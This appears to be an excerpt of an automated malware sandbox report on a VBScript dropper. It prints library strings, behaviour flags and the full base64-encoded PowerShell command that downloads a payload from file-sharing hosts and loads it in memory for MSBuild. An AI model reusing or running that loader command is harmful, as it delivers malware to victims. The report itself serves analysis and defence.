                  Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString(", "0", "false");
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC5A7969 push ebx; retf 2_2_00007FFAAC5A796A
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
